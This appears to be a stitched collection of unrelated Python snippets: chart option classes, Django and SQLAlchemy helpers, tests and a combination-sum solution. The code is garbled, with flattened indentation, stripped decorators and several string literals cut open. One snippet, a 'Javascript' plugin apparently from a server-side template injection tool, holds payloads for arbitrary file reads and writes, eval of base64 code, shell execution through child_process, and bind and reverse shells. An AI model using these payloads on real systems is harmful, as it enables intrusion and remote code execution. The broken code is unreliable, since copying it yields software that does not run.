filter_range_fields = [(('min_date', 'max_date'), models.ScheduleAEfile.contribution_receipt_date), (('min_amount', 'max_amount'), models.ScheduleAEfile.contribution_receipt_amount), (('min_image_number', 'max_image_number'), models.ScheduleAEfile.image_number)]
filter_fulltext_fields = [('contributor_name', models.ScheduleAEfile.contributor_name_text), ('contributor_employer', models.ScheduleAEfile.contributor_employer_text), ('contributor_occupation', models.ScheduleAEfile.contributor_occupation_text)]
def args(self):
return utils.extend(args.paging, args.schedule_a_e_file, args.itemized, args.make_sort_args(default='-contribution_receipt_date', validator=args.OptionValidator(['contribution_receipt_date', 'contribution_receipt_amount']))) |
def generate_verify_code(*, length: int=settings.email_verification_code_length, secret: str=settings.secret.get_secret_value()) -> tuple[(str, str)]:
code = ''.join((secrets.choice((string.ascii_uppercase + string.digits)) for _ in range(length)))
return (code, get_verify_code_hash(code, secret=secret)) |
class TestInitializer(TestCase):
def test_request_type(self):
request = Request(factory.get('/'))
message = 'The `request` argument must be an instance of `django. not `rest_framework.request.Request`.'
with self.assertRaisesMessage(AssertionError, message):
Request(request) |
class OptionPlotoptionsXrangeSonificationContexttracksPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
class Strategy(Protocol, Generic[(models.UP, models.ID)]):
async def read_token(self, token: Optional[str], user_manager: BaseUserManager[(models.UP, models.ID)]) -> Optional[models.UP]:
...
async def write_token(self, user: models.UP) -> str:
...
async def destroy_token(self, token: str, user: models.UP) -> None:
... |
class CustomFormatter(logging.Formatter):
grey = '\x1b[38;20m'
green = '\x1b[1;32m'
yellow = '\x1b[33;20m'
red = '\x1b[31;20m'
bold_red = '\x1b[31;1m'
reset = '\x1b[0m'
format_problem_str = '%(levelname)s - %(message)s'
FORMATS = {logging.DEBUG: ((grey + '%(levelname)s - %(message)s') + reset), logging.INFO: (((green + '%(levelname)s') + reset) + ' - %(message)s'), logging.WARNING: ((yellow + format_problem_str) + reset), logging.ERROR: ((red + format_problem_str) + reset), logging.CRITICAL: ((bold_red + format_problem_str) + reset)}
def format(self, record: logging.LogRecord) -> str:
log_fmt = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_fmt)
return formatter.format(record) |
def get_db_engine(connection_string: str) -> Engine:
connect_args = ({'connect_timeout': 10} if ('pymssql' not in connection_string) else {})
try:
engine = sqlalchemy.create_engine(connection_string, connect_args=connect_args)
except Exception as err:
raise Exception('Failed to create engine!') from err
try:
with engine.begin() as connection:
connection.execute('SELECT 1')
except Exception as err:
raise Exception(f'''Database connection failed with engine:
{engine}!''') from err
return engine |
def downgrade():
op.drop_column('user', 'password_hash')
op.create_table('sessions', sa.Column('id', sa.INTEGER(), nullable=False), sa.Column('session_id', sa.VARCHAR(length=255), nullable=True), sa.Column('data', sa.BLOB(), nullable=True), sa.Column('expiry', sa.DATETIME(), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('session_id')) |
(Book)
class BookAdmin(CustomAdmin):
autocomplete_fields = ['author', 'coll']
fields = ['isbn', 'title', 'author', 'coll']
inlines = []
list_display = ['isbn', 'title']
list_display_links = ['title']
list_filter = [AuthorFilter, CollectionFilter, PeopleWithFavBookFilter]
list_filter_auto = [AutocompleteFilterFactory('author (auto)', 'author'), AutocompleteFilterFactory('collection (auto)', 'coll'), AutocompleteFilterFactory('people with this fav book (auto)', 'people_with_this_fav_book')]
ordering = ['isbn']
search_fields = ['isbn', 'title', 'author__name', 'coll__name'] |
class OptionSeriesTreemapMarker(Options):
def enabled(self):
return self._config_get(None)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def enabledThreshold(self):
return self._config_get(2)
def enabledThreshold(self, num: float):
self._config(num, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False)
def height(self):
return self._config_get(None)
def height(self, num: float):
self._config(num, js_type=False)
def lineColor(self):
return self._config_get('#ffffff')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(0)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(4)
def radius(self, num: float):
self._config(num, js_type=False)
def states(self) -> 'OptionSeriesTreemapMarkerStates':
return self._config_sub_data('states', OptionSeriesTreemapMarkerStates)
def symbol(self):
return self._config_get(None)
def symbol(self, text: str):
self._config(text, js_type=False)
def width(self):
return self._config_get(None)
def width(self, num: float):
self._config(num, js_type=False) |
def update_node_packages(bench_path='.', apps=None, verbose=None):
print('Updating node packages...')
from distutils.version import LooseVersion
from bench.utils.app import get_develop_version
v = LooseVersion(get_develop_version('frappe', bench_path=bench_path))
if (v < LooseVersion('11.x.x-develop')):
update_npm_packages(bench_path, apps=apps, verbose=verbose)
else:
update_yarn_packages(bench_path, apps=apps, verbose=verbose) |
def get_place_trends(ids, exclude=None):
twtr = Twython(**get_place_trends.get_auth_params())
trends_df = pd.DataFrame()
if isinstance(ids, int):
ids = [ids]
for place_id in ids:
place_trends = twtr.get_place_trends(id=place_id)
trend_df = pd.DataFrame(place_trends[0]['trends'])
trend_df = trend_df.sort_values(['tweet_volume'], ascending=False)
trend_df['location'] = place_trends[0]['locations'][0]['name']
trend_df['woeid'] = place_trends[0]['locations'][0]['woeid']
trend_df['time'] = pd.to_datetime(place_trends[0]['created_at'])
trends_df = pd.concat([trends_df, trend_df], ignore_index=True)
trends_df = trends_df.sort_values(['woeid', 'tweet_volume'], ascending=[True, False])
trends_df = trends_df.reset_index(drop=True)
available = get_available_trends()
available = available[['country', 'parentid', 'woeid', 'place_type']]
final_df = pd.merge(trends_df, available, on='woeid')
final_df['local_rank'] = final_df.groupby('woeid')['tweet_volume'].rank(method='dense', ascending=False)
final_df['country_rank'] = final_df.groupby('country')['tweet_volume'].rank(method='dense', ascending=False)
final_df = final_df[['name', 'location', 'tweet_volume', 'local_rank', 'country', 'country_rank', 'time', 'place_type', 'promoted_content', 'woeid', 'parentid']]
return final_df |
def test_mar_values():
current = pd.DataFrame(data=dict(user_id=['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], prediction=[1, 2, 3, 1, 2, 3, 1, 2, 3], target=[1, 0, 0, 0, 0, 0, 0, 0, 1]))
metric = MARKMetric(k=2)
report = Report(metrics=[metric])
column_mapping = ColumnMapping(recommendations_type=RecomType.RANK)
report.run(reference_data=None, current_data=current, column_mapping=column_mapping)
results = metric.get_result()
assert (len(results.current) == 3)
assert (results.current[1] == 0.5)
assert (results.current[2] == 0.5)
assert (results.current[3] == 1) |
def try_load(path: Path, load=pickle.load, mode: str='rb'):
try:
return load(open(path, mode))
except (OSError, pickle.UnpicklingError, RuntimeError, EOFError) as exc:
logger.warning('An error happened when trying to load from %s, this file will be ignored: %r', path, exc)
return None |
class StorageBucket(resource_class_factory('bucket', 'id')):
('iam_policy')
def get_iam_policy(self, client=None):
try:
(data, _) = client.fetch_storage_bucket_iam_policy(self.key())
return data
except (api_errors.ApiExecutionError, ResourceNotSupported) as e:
err_msg = ('Could not get Bucket IAM Policy for %s in project %s: %s' % (self.key(), self.parent().key(), e))
LOGGER.warning(err_msg)
self.add_warning(err_msg)
return None
('gcs_policy')
def get_gcs_policy(self, client=None):
try:
if self['acl']:
return self['acl']
except KeyError:
pass
try:
(data, _) = client.fetch_storage_bucket_acls(self.key(), self.parent()['projectId'], self.parent()['projectNumber'])
return data
except (api_errors.ApiExecutionError, ResourceNotSupported) as e:
err_msg = ('Could not get Bucket ACL Policy for %s in project %s: %s' % (self.key(), self.parent().key(), e))
LOGGER.warning(err_msg)
self.add_warning(err_msg)
return None |
def test_save_string_model(mock_client):
with mock.patch('foundry_dev_tools.cached_foundry_client.CachedFoundryClient.api', mock_client):
cfc = CachedFoundryClient()
model = 'simplestring'
(rid, transaction) = cfc.save_model(model, dataset_path_or_rid='/Namespace1/project1/save_model_test', branch='master', exists_ok=True, mode='SNAPSHOT')
from_foundry = cfc.fetch_dataset('/Namespace1/project1/save_model_test')
import pickle
with Path(from_foundry[0]).joinpath('model.pickle').open(mode='rb') as f:
model_returned = pickle.load(f)
assert (model == model_returned) |
class IntegrationManifestSchema(Schema):
name = fields.Str(required=True)
version = fields.Str(required=True)
release = fields.Str(required=True)
description = fields.Str(required=True)
download = fields.Str(required=True)
conditions = fields.Dict(required=True)
policy_templates = fields.List(fields.Dict)
owner = fields.Dict(required=False)
_load
def transform_policy_template(self, data, **kwargs):
if ('policy_templates' in data):
data['policy_templates'] = [policy['name'] for policy in data['policy_templates']]
return data |
def main():
args = parse_cmd_arguments()
db_file = os.path.abspath(args.db)
if (not os.path.exists(db_file)):
raise RuntimeError(('database does not exist at: ' + db_file))
db_conn = sqlite3.connect(db_file)
if (args.del_entry_by_id is not None):
del_entry(db_conn=db_conn, table=args.table, entry_id=args.del_entry_by_id, op_type=args.op_type)
return
if args.query_missing_75_entries_from_80:
process_missing_75_entries_from_80(db_conn=db_conn, table=args.table, op_type=args.op_type, gen_sm75_entry=False)
return
if args.gen_75_entries_from_80:
process_missing_75_entries_from_80(db_conn=db_conn, table=args.table, op_type=args.op_type, gen_sm75_entry=True)
return
if ((args.query_device is not None) or args.query_all_devices):
query_device = (None if args.query_all_devices else args.query_device)
assert (args.op_type != 'all'), "cannot query 'all' op_type"
db_conn_cur = db_conn.cursor()
query_cache(db_conn_cur=db_conn_cur, table=args.table, op_type=args.op_type, op_keys=args.op_keys, query_template=DEFAULT_QUERY_TEMPLATE, algo=args.algo, device=query_device)
return
if (args.op_keys is None):
raise RuntimeError('Please specify op_keys')
if args.gen_one_75_entry_from_80:
gen_one_75_entry_from_80(db_conn=db_conn, table=args.table, op_type=args.op_type, op_keys=args.op_keys, algo=args.algo)
return |
class OptionPlotoptionsFunnelSonificationTracksMapping(Options):
def frequency(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingFrequency':
return self._config_sub_data('frequency', OptionPlotoptionsFunnelSonificationTracksMappingFrequency)
def gapBetweenNotes(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingGapbetweennotes':
return self._config_sub_data('gapBetweenNotes', OptionPlotoptionsFunnelSonificationTracksMappingGapbetweennotes)
def highpass(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingHighpass':
return self._config_sub_data('highpass', OptionPlotoptionsFunnelSonificationTracksMappingHighpass)
def lowpass(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingLowpass':
return self._config_sub_data('lowpass', OptionPlotoptionsFunnelSonificationTracksMappingLowpass)
def noteDuration(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingNoteduration':
return self._config_sub_data('noteDuration', OptionPlotoptionsFunnelSonificationTracksMappingNoteduration)
def pan(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingPan':
return self._config_sub_data('pan', OptionPlotoptionsFunnelSonificationTracksMappingPan)
def pitch(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingPitch':
return self._config_sub_data('pitch', OptionPlotoptionsFunnelSonificationTracksMappingPitch)
def playDelay(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingPlaydelay':
return self._config_sub_data('playDelay', OptionPlotoptionsFunnelSonificationTracksMappingPlaydelay)
def rate(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingRate':
return self._config_sub_data('rate', OptionPlotoptionsFunnelSonificationTracksMappingRate)
def text(self):
return self._config_get(None)
def text(self, text: str):
self._config(text, js_type=False)
def time(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingTime':
return self._config_sub_data('time', OptionPlotoptionsFunnelSonificationTracksMappingTime)
def tremolo(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingTremolo':
return self._config_sub_data('tremolo', OptionPlotoptionsFunnelSonificationTracksMappingTremolo)
def volume(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingVolume':
return self._config_sub_data('volume', OptionPlotoptionsFunnelSonificationTracksMappingVolume) |
class RequestAccessPermissionButton(widgets.Button):
name = 'plugin/lastfmlove/request_access_permission'
def __init__(self, preferences, widget):
widgets.Button.__init__(self, preferences, widget)
self.message = dialogs.MessageBar(parent=preferences.builder.get_object('preferences_box'), buttons=Gtk.ButtonsType.CLOSE)
self.errors = {pylast.STATUS_INVALID_API_KEY: _('The API key is invalid.')}
def check_connection(self):
api_key = settings.get_option('plugin/lastfmlove/api_key', 'K')
try:
pylast.LastFMNetwork(api_key=api_key, api_secret=settings.get_option('plugin/lastfmlove/api_secret', 'S'), username=settings.get_option('plugin/ascrobbler/user', ''), password_hash=settings.get_option('plugin/ascrobbler/password', ''))
except pylast.WSError as e:
GLib.idle_add(self.message.show_error, self.errors[int(e.get_id())], _('Please make sure the entered data is correct.'))
else:
application_launched = Gtk.show_uri(Gdk.Screen.get_default(), ' Gdk.CURRENT_TIME)
if (not application_launched):
url = '
GLib.idle_add(self.message.show_warning, _('Could not start web browser'), _('Please copy the following URL and open it with your web browser:\n<b><a href="{url}">{url}</a></b>').format(url=url))
def on_clicked(self, button):
self.check_connection() |
def test_comparison_refs():
def dummy_node(node_id) -> Node:
n = Node(node_id, metadata=None, bindings=[], upstream_nodes=[], flyte_entity=SQLTask(name='x', query_template='x', inputs={}))
n._id = node_id
return n
px = Promise('x', NodeOutput(var='x', node=dummy_node('n1')))
py = Promise('y', NodeOutput(var='y', node=dummy_node('n2')))
def print_expr(expr):
print(f'{expr} is type {type(expr)}')
print_expr((px == py))
print_expr((px < py))
print_expr(((px == py) & (px < py)))
print_expr((((px == py) & (px < py)) | (px > py)))
print_expr((px < 5))
print_expr((px >= 5))
print_expr((px != 5)) |
def unsupported_feature():
print('Error: You have an unsupported version of Python interpreter dnspython library.')
print(' Some features such as DoT and DoH are not available. You should upgrade')
print(' the Python interpreter to at least 3.7 and reinstall dependencies.')
sys.exit(127) |
def gen_common_macros(out):
out.write('\n/**\n * Macros for initializing and checking scalar types\n *\n * var The variable being initialized or checked\n * val The integer value to set/check against, see below\n *\n * Note that equality means something special for strings. Each byte\n * is initialized to an incrementing value. So check is done against that.\n *\n */\n\n')
for t in scalar_types:
if (t in integer_types):
out.write(('\n#define VAR_%s_INIT(var, val) var = (%s)(val)\n#define VAR_%s_CHECK(var, val) ((var) == (%s)(val))\n' % (t.upper(), t, t.upper(), t)))
else:
out.write(('\n#define VAR_%s_INIT(var, val) \\\n of_test_str_fill((uint8_t *)&(var), val, sizeof(var))\n#define VAR_%s_CHECK(var, val) \\\n of_test_str_check((uint8_t *)&(var), val, sizeof(var))\n' % (t.upper(), t.upper()))) |
def Base(search_manager_regconfig):
Base = declarative_base()
make_searchable(Base.metadata)
if search_manager_regconfig:
search_manager.options['regconfig'] = search_manager_regconfig
(yield Base)
search_manager.options['regconfig'] = 'pg_catalog.english'
search_manager.processed_columns = []
vectorizer.clear()
remove_listeners(Base.metadata) |
class Treemap():
def __init__(self, trees):
self.done = False
self.trees = trees
self.hatches_gen = hatches()
def compute(self):
def new_size_method():
size_cache = {}
def _size(thing):
if isinstance(thing, int):
return thing
if (thing in size_cache):
return size_cache[thing]
else:
size_cache[thing] = reduce(int.__add__, [_size(x) for x in thing])
return size_cache[thing]
return _size
(fig, (ax1, ax2)) = plt.subplots(1, 2, figsize=(6, 3.5), constrained_layout=True, sharey=True)
ax1.set_xticks([])
ax1.set_yticks([])
ax2.set_xticks([])
ax2.set_yticks([])
self.iter_method = iter
for ((title, sizes, tree, labels), ax) in zip(self.trees, [ax1, ax2]):
self.size_method = new_size_method()
self.ax = ax
self.rectangles = []
self.addnode(tree, lower=[0, 0], upper=[1, 1], axis=0)
ax.set_xlabel(title)
for (n, r) in self.rectangles:
if isinstance(n, int):
size = str(sizes[n])
label = str(labels[n])
(rx, ry) = r.get_xy()
cx = (rx + (r.get_width() / 2.0))
cy = (ry + (r.get_height() / 2.0))
ax.annotate(f'''{size}
{label}''', (cx, cy), color='k', backgroundcolor='w', weight='bold', fontsize=9, ha='center', va='center')
self.done = True
def as_svg(self):
if (not self.done):
self.compute()
svg = io.BytesIO()
plt.savefig(svg, format='svg')
return svg.getvalue().decode(encoding='UTF-8').strip()
def addnode(self, node, lower=[0, 0], upper=[1, 1], axis=0):
axis = (axis % 2)
hatch = self.draw_rectangle(lower, upper, node)
width = (upper[axis] - lower[axis])
try:
for child in self.iter_method(node):
if (self.size_method(node) == 0):
continue
upper[axis] = (lower[axis] + ((width * float(self.size_method(child))) / self.size_method(node)))
self.addnode(child, list(lower), list(upper), (axis + 1))
lower[axis] = upper[axis]
except TypeError:
pass
def draw_rectangle(self, lower, upper, node):
h = None
if isinstance(node, int):
h = next(self.hatches_gen)
r = Rectangle(lower, (upper[0] - lower[0]), (upper[1] - lower[1]), edgecolor='k', fill=False, hatch=h)
self.ax.add_patch(r)
self.rectangles.append((node, r))
return h |
def test_parse_arg_level_1(caplog):
args = [path.relpath(__file__), '--debug', '--level', '1']
cis_audit.parse_arguments(argv=args)
status = False
for record in caplog.records:
if (record.msg == 'Going to run Level 1 tests'):
status = True
break
assert status |
class TimeField(Field):
default_error_messages = {'invalid': _('Time has wrong format. Use one of these formats instead: {format}.')}
datetime_parser = datetime.datetime.strptime
def __init__(self, format=empty, input_formats=None, **kwargs):
if (format is not empty):
self.format = format
if (input_formats is not None):
self.input_formats = input_formats
super().__init__(**kwargs)
def to_internal_value(self, value):
input_formats = getattr(self, 'input_formats', api_settings.TIME_INPUT_FORMATS)
if isinstance(value, datetime.time):
return value
for input_format in input_formats:
if (input_format.lower() == ISO_8601):
try:
parsed = parse_time(value)
except (ValueError, TypeError):
pass
else:
if (parsed is not None):
return parsed
else:
try:
parsed = self.datetime_parser(value, input_format)
except (ValueError, TypeError):
pass
else:
return parsed.time()
humanized_format = humanize_datetime.time_formats(input_formats)
self.fail('invalid', format=humanized_format)
def to_representation(self, value):
if (value in (None, '')):
return None
output_format = getattr(self, 'format', api_settings.TIME_FORMAT)
if ((output_format is None) or isinstance(value, str)):
return value
assert (not isinstance(value, datetime.datetime)), 'Expected a `time`, but got a `datetime`. Refusing to coerce, as this may mean losing timezone information. Use a custom read-only field and deal with timezone issues explicitly.'
if (output_format.lower() == ISO_8601):
return value.isoformat()
return value.strftime(output_format) |
class Solution():
def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:
def find_combination(candidates, idx, target, curr, ret):
if (target < 0):
return
if (target == 0):
ret.append(list(curr))
return
if (idx >= len(candidates)):
return
n = candidates[idx]
i = 0
while ((i * n) <= target):
find_combination(candidates, (idx + 1), (target - (i * n)), (curr + ([n] * i)), ret)
i += 1
candidates.sort()
ret = []
curr = []
find_combination(candidates, 0, target, curr, ret)
return ret |
class OptionNavigationBreadcrumbsSeparator(Options):
def style(self) -> 'OptionNavigationBreadcrumbsSeparatorStyle':
return self._config_sub_data('style', OptionNavigationBreadcrumbsSeparatorStyle)
def text(self):
return self._config_get('/')
def text(self, text: str):
self._config(text, js_type=False) |
def fetch_consumption(zone_key: str='KW', session: (Session | None)=None, target_datetime: (datetime | None)=None, logger: Logger=getLogger(__name__)):
if target_datetime:
raise NotImplementedError('This parser is not yet able to parse past dates')
r = (session or Session())
url = '
response = r.get(url)
load = re.findall('\\((\\d{4,5})\\)', response.text)
load = int(load[0])
consumption = load
datapoint = {'zoneKey': zone_key, 'datetime': datetime.now(tz=ZoneInfo('Asia/Kuwait')), 'consumption': consumption, 'source': 'mew.gov.kw'}
return datapoint |
class InlineCKEditorWidget(forms.Textarea):
def __init__(self, *args, **kwargs):
self.ckeditor = (kwargs.pop('ckeditor') or _url())
self.config = (kwargs.pop('config') or _config()['default'])
attrs = kwargs.setdefault('attrs', {})
attrs['data-inline-cke'] = id(self.config)
if (django.VERSION < (4, 2)):
attrs['data-inline-cke-dj41'] = True
super().__init__(*args, **kwargs)
def media(self):
return forms.Media(css={'all': ['feincms3/inline-ckeditor.css']}, js=[self.ckeditor, JS('feincms3/inline-ckeditor.js', {'data-inline-cke-id': id(self.config), 'data-inline-cke-config': json.dumps(self.config, cls=DjangoJSONEncoder), 'defer': 'defer'})]) |
def gen_string(uni_str, exception=False):
if (uni_str is None):
if exception:
raise TypeError('None not allowed')
return b''
if (not hasattr(uni_str, 'encode')):
if exception:
raise TypeError('uni_str required function encode(format)')
return b''
try:
utf8_str = uni_str.encode('utf8')
if (MQTT_NONE_CHAR in utf8_str):
if exception:
raise ValueError('char 0x0000 not allowed')
utf8_str = utf8_str.replace(MQTT_NONE_CHAR, b'')
str_size = len(utf8_str)
fmt = ('!H' + ('B' * str_size))
byte_str = tuple(utf8_str)
return struct.pack(fmt, str_size, *byte_str)
except UnicodeDecodeError as ex:
if exception:
raise ex
except TypeError as ex:
if exception:
raise ex
return b'' |
class Javascript(Plugin):
def language_init(self):
self.update_actions({'render': {'call': 'inject', 'render': '%(code)s', 'header': "'%(header)s'+", 'trailer': "+'%(trailer)s'", 'test_render': ('typeof(%(r1)s)+%(r2)s' % {'r1': rand.randints[0], 'r2': rand.randints[1]}), 'test_render_expected': ('number%(r2)s' % {'r2': rand.randints[1]})}, 'write': {'call': 'inject', 'write': "require('fs').appendFileSync('%(path)s', Buffer('%(chunk_b64)s', 'base64'), 'binary')//", 'truncate': "require('fs').writeFileSync('%(path)s', '')"}, 'read': {'call': 'render', 'read': "require('fs').readFileSync('%(path)s').toString('base64')"}, 'md5': {'call': 'render', 'md5': 'require(\'crypto\').createHash(\'md5\').update(require(\'fs\').readFileSync(\'%(path)s\')).digest("hex")'}, 'evaluate': {'call': 'render', 'evaluate': "eval(Buffer('%(code_b64)s', 'base64').toString())", 'test_os': "require('os').platform()", 'test_os_expected': '^[\\w-]+$'}, 'blind': {'call': 'execute_blind', 'test_bool_true': 'true', 'test_bool_false': 'false'}, 'execute_blind': {'call': 'inject', 'execute_blind': "require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i')//"}, 'execute': {'call': 'render', 'execute': "require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString())", 'test_cmd': (bash.printf % {'s1': rand.randstrings[2]}), 'test_cmd_expected': rand.randstrings[2]}, 'bind_shell': {'call': 'execute_blind', 'bind_shell': bash.bind_shell}, 'reverse_shell': {'call': 'execute_blind', 'reverse_shell': bash.reverse_shell}})
self.set_contexts([{'level': 0}, {'level': 1, 'prefix': '%(closure)s;', 'suffix': '//', 'closures': ctx_closures}, {'level': 2, 'prefix': '%(closure)s', 'suffix': '//', 'closures': ctx_closures}, {'level': 5, 'prefix': '*/', 'suffix': '/*'}])
language = 'javascript' |
def test_metadata(fx_asset):
with Image(filename=str(fx_asset.joinpath('beach.jpg'))) as img:
assert (len(img.metadata) > 0)
for key in img.metadata:
assert isinstance(key, string_type)
assert ('exif:ApertureValue' in img.metadata)
assert ('exif:UnknownValue' not in img.metadata)
assert (img.metadata['exif:ApertureValue'] == '192/32')
assert (img.metadata.get('exif:UnknownValue', 'IDK') == 'IDK') |
class MainWindow(ApplicationWindow):
data = List(Instance(Person))
row_info = Instance(AbstractRowInfo)
data_view = Instance(IDataViewWidget)
def _create_contents(self, parent):
self.data_view.create(parent)
return self.data_view.control
def _data_default(self):
logger.info('Initializing data')
people = [Person(name=('%s %s' % (any_name(), family_name())), age=age(), favorite_color=favorite_color(), address=Address(street=street(), city=city(), country=country())) for i in range(100)]
logger.info('Data initialized')
return people
def _data_view_default(self):
return DataViewWidget(data_model=ColumnDataModel(data=self.data, row_info=self.row_info), selection_mode='extended', exporters=[RowExporter(format=table_format, column_headers=True, row_headers=True), RowExporter(format=csv_format, column_headers=True)])
def destroy(self):
self.data_view.destroy()
super().destroy() |
def get_fstring_from_call(ghidra_analysis, key_string, call_args, func, call, sources):
if (call in call_args):
arg_values = call_args[call]
else:
(_, arg_values) = get_call_site_args(ghidra_analysis, func, call, sources)
call_args[call] = arg_values
start = 1
for arg_value in arg_values:
strings = [arg for arg in arg_value if isinstance(arg, str)]
if (key_string in '\t'.join(strings)):
for arg in arg_value:
indices = get_format_specifier_indices(key_string, arg)
format_types = get_format_types(arg)
break
start += 1
else:
return []
return filter_relevant_indices(start, arg_values, indices, format_types) |
def _coconut_iter_getitem(iterable, index):
obj_iter_getitem = _coconut.getattr(iterable, '__iter_getitem__', None)
if ((obj_iter_getitem is None) and _coconut.isinstance(iterable, _coconut.abc.Sequence)):
obj_iter_getitem = _coconut.getattr(iterable, '__getitem__', None)
if (obj_iter_getitem is not None):
try:
result = obj_iter_getitem(index)
except _coconut.NotImplementedError:
pass
else:
return result
if (not _coconut.isinstance(index, _coconut.slice)):
index = _coconut.operator.index(index)
if (index < 0):
return _coconut.collections.deque(iterable, maxlen=(- index))[0]
result = _coconut.next(_coconut.itertools.islice(iterable, index, (index + 1)), _coconut_sentinel)
if (result is _coconut_sentinel):
raise _coconut.IndexError('.$[] index out of range')
return result
start = (_coconut.operator.index(index.start) if (index.start is not None) else None)
stop = (_coconut.operator.index(index.stop) if (index.stop is not None) else None)
step = (_coconut.operator.index(index.step) if (index.step is not None) else 1)
if (step == 0):
raise _coconut.ValueError('slice step cannot be zero')
if ((start is None) and (stop is None) and (step == (- 1))):
obj_reversed = _coconut.getattr(iterable, '__reversed__', None)
if (obj_reversed is not None):
try:
result = obj_reversed()
except _coconut.NotImplementedError:
pass
else:
if (result is not _coconut.NotImplemented):
return result
if (step >= 0):
start = (0 if (start is None) else start)
if (start < 0):
cache = _coconut.collections.deque(_coconut.enumerate(iterable, 1), maxlen=(- start))
len_iter = (cache[(- 1)][0] if cache else 0)
i = _coconut.max((len_iter + start), 0)
if (stop is None):
j = len_iter
elif (stop >= 0):
j = _coconut.min(stop, len_iter)
else:
j = _coconut.max((len_iter + stop), 0)
n = (j - i)
if (n <= 0):
return ()
if ((n < (- start)) or (step != 1)):
cache = _coconut.itertools.islice(cache, 0, n, step)
return _coconut_map(_coconut.operator.itemgetter(1), cache)
elif ((stop is None) or (stop >= 0)):
return _coconut.itertools.islice(iterable, start, stop, step)
else:
return _coconut_iter_getitem_special_case(iterable, start, stop, step)
else:
start = ((- 1) if (start is None) else start)
if ((stop is not None) and (stop < 0)):
n = ((- stop) - 1)
cache = _coconut.collections.deque(_coconut.enumerate(iterable, 1), maxlen=n)
len_iter = (cache[(- 1)][0] if cache else 0)
if (start < 0):
(i, j) = (start, stop)
else:
(i, j) = (_coconut.min((start - len_iter), (- 1)), None)
return _coconut_map(_coconut.operator.itemgetter(1), _coconut.tuple(cache)[i:j:step])
else:
if (stop is not None):
m = (stop + 1)
iterable = _coconut.itertools.islice(iterable, m, None)
if (start < 0):
i = start
n = None
elif (stop is None):
i = None
n = (start + 1)
else:
i = None
n = (start - stop)
if (n is not None):
if (n <= 0):
return ()
iterable = _coconut.itertools.islice(iterable, 0, n)
return _coconut.tuple(iterable)[i::step] |
class OptionSeriesAreasplinerangeDataEvents(Options):
def click(self):
return self._config_get(None)
def click(self, value: Any):
self._config(value, js_type=False)
def drag(self):
return self._config_get(None)
def drag(self, value: Any):
self._config(value, js_type=False)
def dragStart(self):
return self._config_get(None)
def dragStart(self, value: Any):
self._config(value, js_type=False)
def drop(self):
return self._config_get(None)
def drop(self, value: Any):
self._config(value, js_type=False)
def mouseOut(self):
return self._config_get(None)
def mouseOut(self, value: Any):
self._config(value, js_type=False)
def mouseOver(self):
return self._config_get(None)
def mouseOver(self, value: Any):
self._config(value, js_type=False)
def remove(self):
return self._config_get(None)
def remove(self, value: Any):
self._config(value, js_type=False)
def select(self):
return self._config_get(None)
def select(self, value: Any):
self._config(value, js_type=False)
def unselect(self):
return self._config_get(None)
def unselect(self, value: Any):
self._config(value, js_type=False)
def update(self):
return self._config_get(None)
def update(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesItemStatesHoverMarker(Options):
def enabled(self):
return self._config_get(None)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def enabledThreshold(self):
return self._config_get(2)
def enabledThreshold(self, num: float):
self._config(num, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False)
def height(self):
return self._config_get(None)
def height(self, num: float):
self._config(num, js_type=False)
def lineColor(self):
return self._config_get('#ffffff')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(0)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(4)
def radius(self, num: float):
self._config(num, js_type=False)
def width(self):
return self._config_get(None)
def width(self, num: float):
self._config(num, js_type=False) |
def import_symbol(symbol_path):
if (':' in symbol_path):
(module_name, symbol_name) = symbol_path.split(':')
module = import_module(module_name)
symbol = eval(symbol_name, module.__dict__)
else:
components = symbol_path.split('.')
module_name = '.'.join(components[:(- 1)])
symbol_name = components[(- 1)]
module = __import__(module_name, globals(), locals(), [symbol_name])
symbol = getattr(module, symbol_name)
return symbol |
def add_tags(ids: List[int], tags: List[str]):
if ((tags is None) or (ids is None) or (len(ids) == 0)):
return
ids = ','.join([str(id) for id in ids])
conn = _get_connection()
notes = conn.execute(f'select id, tags from notes where id in ({ids})').fetchall()
updated = []
for (nid, tstr) in notes:
spl = tstr.split(' ')
for t in tags:
t = t.strip()
if (not (t in spl)):
spl.append(t)
spl = [s.strip() for s in spl]
updated.append(((' %s ' % ' '.join(spl)), nid))
conn.executemany('update notes set tags = ? where id= ?', updated)
conn.commit()
conn.close() |
class stalkerForm(QDialog, Ui_StalkerDialog):
def __init__(self, parent=None):
super(stalkerForm, self).__init__(parent)
self.setupUi(self)
self.setWindowOpacity(0.93)
self.btnSubmit.clicked.connect(self.submit)
